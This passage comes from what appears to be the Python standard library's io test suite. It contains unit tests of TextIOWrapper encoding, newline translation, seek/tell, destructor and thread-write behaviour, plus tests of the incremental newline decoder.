b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
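# Each entry in "tests" pairs a newline argument with the lines expected back
# from the wrapper.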
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
data = ''.join(input_lines).encode(encoding)
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
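# testdict maps each newline argument to the bytes expected in the underlying
# buffer; newline=None is checked against the os.linesep entry.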
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
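# Round-trip write/read/seek/tell across several chunk sizes and encodings.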
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in ("ascii", "latin-1", "utf-8"):  # "utf-16-be", "utf-16-le" left out
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
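# tell() cookies taken around writes must match those seen when reading back,
# and tell() raises OSError while the file is being iterated.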
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
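# Read a prefix two characters short of the decoder chunk size, then check
# that tell() and the following multi-byte line are still correct.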
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check that the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
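# The test_issue1395_* tests below read self.testdata through different
# chunkings (single chars, fixed chunks, readline, seek/tell) and compare the
# result against self.normalized.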
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
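# Every file object method must raise ValueError once the file is closed,
# across all of the open() modes exercised below.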
for kwargs in [
{"mode": "w"},
